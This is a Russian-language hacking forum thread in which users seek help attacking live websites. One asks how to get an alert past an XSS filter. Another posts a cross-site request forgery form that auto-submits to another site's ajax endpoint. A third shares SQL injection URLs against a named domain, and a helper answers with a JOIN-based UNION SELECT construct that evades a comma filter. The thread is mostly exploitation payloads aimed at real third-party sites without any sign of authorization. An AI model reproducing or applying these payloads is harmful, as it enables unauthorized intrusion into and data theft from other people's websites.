Вопрос насчет XSS. Фильтр пускает все, но есть защита , все что между скобок удаляет, и если поставить пробел через скобку тоже пускает, но как вывести алерт не понял. p.s не получилось. пож помогите. сайт скину в ЛС
Ты видел что я написал? там нету директорий в которые можно хоть что то написать, и возможности записи - нет. Тут либо снипеты остаются, либо док менеджер...
Здраствуйте, не могу отправить пост форму ajax c сообщением. Проверка на CSRF , сообщение без перезагрузки страницы Никаких скрытых параметров не передается, может есть какая то особенность в этих форм ? Код формы HTML: <form action="сайт/ajax/curency" method="post"> <textarea maxlength="2048" rows="5" required="required" class="form-control" name="msg_body"></textarea> <br> <button class="btn btn-success" type="button" onclick="send_message_for_user(this); return false;"> Отправить сообщение </button> <input name="xxx" value="yy" type="hidden"> <input name="xxx" value="yy" type="hidden"> </form> </div> Мой код формы автоматической отправки с другого домена HTML: <form method="post" action="сайт/ajax/curency" <input name="msg_body" value=" сообщение" type="text"> <input name="xxx" value="yyy" type="hidden"> <input name="xxx" value"yyy" type="hidden"> </form> <script>document.getElementsByTagName('form')[0].submit();</script>
http://www.bbctop.cc/index.php?act=respons.respons&cid=%27 Как подключится ? пытался havil1.6 и дампером не катит
Фильтрация на запятые. Code: http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1,2)=(1,2)+order+by+10+--+ http://www.bbctop.cc/index.php?act=respons.respons&cid=2+and+(1)=(1)+order+by+10+--+ Используйте конструкции join
Если не сложно, расскажи более подробно. Очень интересно но сути не уловил. В принципе, запрос итак проходит (к тому же на первом запросе, запятые по прежнему остаются в запросе?): Code: http://www.bbctop.cc/index.php?act=respons.respons&cid=27+order+by+10-- Проблема начинается в http://www.bbctop.cc/index.php?act=respons.respons&cid=-27+union+select+1,2,3,4,5,6,7,8,9,10-- Можешь показать на этом примере? Спасибо!
Потому что запятые. Я это написал ранее. Используйте конструкции без запятых. (select+1)a join (select+2)b join (select+3)c Топик называется "Помощь по уязвимостям", а не "Сделай всё за нас". Мы помогаем, вы анализируете в чём косяк и пытаетесь решить, прикладывая свои решения. А мы уже исправляем их и направляем в нужное русло. Стратегия понятна?
Полностью согласен. Дело в том, что ты так написал как будто выше - пример, отсюда недопонимание. А так Гугл вообще мой братец)